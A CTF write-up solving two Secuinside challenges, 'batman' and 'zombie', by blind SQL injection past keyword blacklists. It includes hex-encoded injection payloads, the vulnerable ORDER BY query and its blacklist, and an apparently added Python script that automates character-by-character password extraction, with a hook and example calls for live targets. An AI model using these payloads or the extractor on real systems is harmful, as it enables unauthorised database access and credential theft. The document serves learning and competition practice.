batman: hard-filtered blind SQL injection

http://61.42.25.29/0f9dd0e033bb0854c9de75939680ce66/?no=1 (link is down)

Didn’t have the source for this one, and most keywords were blocked. The query looked something like:

SELECT id,no FROM batman WHERE no=$_GET['no'];
The only working string functions I could find were:
instr, position, substr

All kinds of operators, and spaces, were blocked, so I used this:

**?no=if(instr(id,0x30),3,5)**

So if 0x[something] occurs in “id” I got some text; if not, the page was blank. I used a PHP script to quickly discover all the characters used, and they were:

D O P W d o p w

Then I manually combined the characters like this to get the flag:

?no=if(instr(id,0x646f),3,5)

etc. The flag was opwwddddoo. instr is case-insensitive, and I luckily guessed the flag is lowercase :D


zombie: blind SQL injection after ORDER BY…

// blacklist: load, union, space, tab, slash, char/ascii/hex, <, >, infor (information_schema), '.', and the other challenge tables
if(eregi("load|union| |\t|/|char|ascii|hex|<|>|infor|\.|challenge2|challenge3|challenge4",$dd)) exit("Access Denied");
// $dd is interpolated unquoted and unescaped after ORDER BY, so anything not on the blacklist runs as SQL
$q=mysql_query("select * from challenge1 order by $dd desc");

The procedure is the same as for batman, but this time I used LIKE (every whitespace was %0a, since space and tab are filtered):

**if((select password from challenge1 where id=0x61646d696e and password like 0x253025),1,(select 1 from challenge1))** -> if the LIKE is false, it errors (Subquery returns more than one row, because the else branch selects every row of challenge1)

I used a PHP script to get it char by char, ending up with OLDZOMBIEEEE if I remember correctly. Again, I guessed the case of the flag ^^
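Both oracles above follow the same pattern: encode the probe as a hex literal so no quotes or spaces are needed, pick a query branch that makes the response visibly differ, and loop. The following Python is an added example that mirrors the batman instr() character discovery and the zombie LIKE prefix extension; it is not the PHP script from the writeup. The table and column names are the ones quoted above; the HTTP oracle (URL template, a response marker, the MySQL error text as the zombie signal) is an assumed interface, and the two "fake_*" servers are constructed stand-ins so the script runs offline.

```python
"""Blind-SQLi extraction helpers for the batman (instr) and zombie (LIKE) oracles.
Added example, not the writeup's PHP script. The live server is replaced by
constructed stand-ins (fake_batman / fake_zombie); http_oracle() is the hook
for a real target."""
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

Oracle = Callable[[str], bool]   # payload -> True when the "match" branch fired


def hexlit(s: str) -> str:
    """MySQL hex literal (0x...): carries a string without quotes or spaces."""
    if not s:
        raise ValueError("MySQL has no empty hex literal")
    return "0x" + s.encode().hex()


# ---- batman: which characters occur anywhere in id? -----------------------
def batman_payload(ch: str) -> str:
    # WHERE no=if(instr(id,0x..),3,5): row 3 renders text, row 5 is blank
    return f"if(instr(id,{hexlit(ch)}),3,5)"


def discover_chars(oracle: Oracle, alphabet: str) -> str:
    """Every character of `alphabet` the instr() oracle reports as present."""
    return "".join(c for c in alphabet if oracle(batman_payload(c)))


# ---- zombie: grow a LIKE prefix one character at a time -------------------
def zombie_payload(prefix: str, exact: bool = False) -> str:
    """ORDER BY expression; newlines replace the filtered space/tab (%0a on the wire).
    The inner SELECT yields admin's password only when the LIKE matches. It is tested
    with IS NOT NULL because IF() coerces a bare string condition to a number (a
    non-numeric password would read as 0, i.e. false). The false branch selects the
    whole table, so MySQL raises "Subquery returns more than one row"."""
    pattern = prefix if exact else prefix + "%"
    inner = ("(select\npassword\nfrom\nchallenge1\nwhere\nid=" + hexlit("admin")
             + "\nand\npassword\nlike\n" + hexlit(pattern) + ")")
    return f"if({inner}\nis\nnot\nnull,1,(select\n1\nfrom\nchallenge1))"


def extract_like(oracle: Oracle, alphabet: str, max_len: int = 64) -> str:
    """Prefix-extension search. The result takes whatever case `alphabet` uses,
    since LIKE is case-insensitive here; the real case must be settled separately."""
    if any(w in alphabet for w in "%_"):
        raise ValueError("LIKE wildcards in the alphabet would match anything; escape them")
    found = ""
    for _ in range(max_len):
        nxt: Optional[str] = next((c for c in alphabet if oracle(zombie_payload(found + c))), None)
        if nxt is None:
            break
        found += nxt
    if not found:
        raise RuntimeError("no character of the alphabet matched the first position")
    # Confirm without a trailing wildcard so a truncated result is reported, not returned.
    if not oracle(zombie_payload(found, exact=True)):
        raise RuntimeError(f"{found!r} is only a prefix: alphabet incomplete or max_len hit")
    return found


# ---- oracles ---------------------------------------------------------------
def http_oracle(url_template: str, marker: str, negate: bool = False) -> Oracle:
    """Live oracle (assumed interface, not exercised offline): url_template has one
    '{}' for the payload; a probe is true when `marker` occurs in the body, or with
    negate=True when it is absent (zombie: marker = the MySQL error text)."""
    def oracle(payload: str) -> bool:
        url = url_template.format(urllib.parse.quote(payload, safe="(),="))
        with urllib.request.urlopen(url, timeout=10) as resp:
            hit = marker in resp.read().decode(errors="replace")
        return hit != negate
    return oracle


_HEX = re.compile(r"0x([0-9a-fA-F]+)")


def fake_batman(secret: str) -> Oracle:
    """Constructed stand-in for the batman server: case-insensitive instr()."""
    def oracle(payload: str) -> bool:
        needle = bytes.fromhex(_HEX.search(payload).group(1)).decode()
        return needle.lower() in secret.lower()
    return oracle


def fake_zombie(secret: str) -> Oracle:
    """Constructed stand-in for the zombie server: True when admin's password matches
    the LIKE pattern (the last hex literal in the payload), i.e. no error is raised."""
    def oracle(payload: str) -> bool:
        pattern = bytes.fromhex(_HEX.findall(payload)[-1]).decode()
        rx = "^" + "".join(".*" if c == "%" else "." if c == "_" else re.escape(c)
                           for c in pattern) + "$"
        return re.match(rx, secret, re.IGNORECASE) is not None
    return oracle


if __name__ == "__main__":
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    print(discover_chars(fake_batman("opwwddddoo"), alphabet))
    print(extract_like(fake_zombie("OLDZOMBIEEEE"), alphabet))
```

Against a real target you would pass something like `http_oracle("http://host/?no={}", "some text")` for batman and `http_oracle("http://host/?dd={}", "Subquery returns more than one row", negate=True)` for zombie; the exact-match confirmation at the end of `extract_like` is the check that distinguishes "the alphabet ran out" from "the string ended", which a plain prefix loop cannot tell apart.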


Well, this is one pretty damn long wall of text :D…

I’d like to thank the Secuinside people for this great CTF, I really enjoyed it and learned a few new things and tricks! Also thanks to Reiners for his blog and to hvortex for the sqlgeek solution!

Regards, Plitvix